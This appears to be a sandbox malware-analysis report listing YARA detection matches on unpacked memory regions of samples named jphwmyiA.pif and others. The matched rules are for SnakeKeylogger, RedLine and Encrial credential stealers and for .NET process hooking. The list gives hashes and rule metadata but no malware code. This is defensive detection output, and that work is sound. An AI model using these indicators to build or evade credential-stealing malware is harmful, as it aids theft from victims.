Source: 16.2.jphwmyiA.pif.1d140000.6.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 16.2.jphwmyiA.pif.1d140000.6.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 16.2.jphwmyiA.pif.1d140000.6.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 20.3.jphwmyiA.pif.283edba0.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 20.3.jphwmyiA.pif.283edba0.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 20.3.jphwmyiA.pif.283edba0.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 12.3.jphwmyiA.pif.24507b80.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 12.3.jphwmyiA.pif.24507b80.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 12.3.jphwmyiA.pif.24507b80.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 16.2.jphwmyiA.pif.1d140000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 16.2.jphwmyiA.pif.1d140000.6.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 16.2.jphwmyiA.pif.1d140000.6.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 12.2.jphwmyiA.pif.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 16.2.jphwmyiA.pif.1cb10000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 16.2.jphwmyiA.pif.1cb10000.4.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 16.2.jphwmyiA.pif.1cb10000.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 12.2.jphwmyiA.pif.25f299de.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 12.2.jphwmyiA.pif.25f299de.3.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 12.2.jphwmyiA.pif.25f299de.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 13.2.Aiymwhpj.PIF.212333d8.7.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 8.2.brightness.exe.215f2418.11.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 12.2.jphwmyiA.pif.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 16.2.jphwmyiA.pif.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 20.2.jphwmyiA.pif.2c9b0000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 20.2.jphwmyiA.pif.2c9b0000.5.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 20.2.jphwmyiA.pif.2c9b0000.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 20.2.jphwmyiA.pif.2c9b0ee8.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 12.2.jphwmyiA.pif.28730ee8.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 20.2.jphwmyiA.pif.2c9b0ee8.4.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 12.2.jphwmyiA.pif.28730ee8.4.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 20.2.jphwmyiA.pif.2c9b0ee8.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 12.2.jphwmyiA.pif.28730ee8.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 16.2.jphwmyiA.pif.400000.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 16.1.jphwmyiA.pif.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 12.1.jphwmyiA.pif.400000.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 20.2.jphwmyiA.pif.2a0399de.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 20.2.jphwmyiA.pif.2a0399de.2.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 20.2.jphwmyiA.pif.2a0399de.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 20.2.jphwmyiA.pif.2a03a8c6.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 20.2.jphwmyiA.pif.2c9b0ee8.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 12.2.jphwmyiA.pif.25f2a8c6.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 20.2.jphwmyiA.pif.2a03a8c6.3.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 20.2.jphwmyiA.pif.2c9b0ee8.4.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 12.2.jphwmyiA.pif.25f2a8c6.2.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 20.2.jphwmyiA.pif.2a03a8c6.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 12.2.jphwmyiA.pif.25f2a8c6.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 20.2.jphwmyiA.pif.2c9b0ee8.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 12.2.jphwmyiA.pif.28730000.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 12.2.jphwmyiA.pif.28730000.5.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 12.2.jphwmyiA.pif.28730000.5.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 20.2.jphwmyiA.pif.2d020000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 12.1.jphwmyiA.pif.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 16.2.jphwmyiA.pif.1a1da8c6.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 20.2.jphwmyiA.pif.2d020000.6.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 16.2.jphwmyiA.pif.1a1da8c6.2.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 20.2.jphwmyiA.pif.2d020000.6.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 16.2.jphwmyiA.pif.1a1da8c6.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 16.2.jphwmyiA.pif.1cb10000.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 16.2.jphwmyiA.pif.1cb10ee8.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 16.2.jphwmyiA.pif.1cb10000.4.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 16.2.jphwmyiA.pif.1cb10ee8.5.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 16.2.jphwmyiA.pif.1cb10000.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 16.2.jphwmyiA.pif.1cb10ee8.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 20.2.jphwmyiA.pif.2d020000.6.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 20.2.jphwmyiA.pif.2d020000.6.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 20.2.jphwmyiA.pif.2d020000.6.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 12.2.jphwmyiA.pif.28fc0000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 12.2.jphwmyiA.pif.28fc0000.6.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 12.3.jphwmyiA.pif.24507b80.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 20.2.jphwmyiA.pif.2a0399de.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 12.2.jphwmyiA.pif.28fc0000.6.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 20.2.jphwmyiA.pif.2a0399de.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 12.3.jphwmyiA.pif.24507b80.0.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 20.2.jphwmyiA.pif.2a0399de.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 12.3.jphwmyiA.pif.24507b80.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
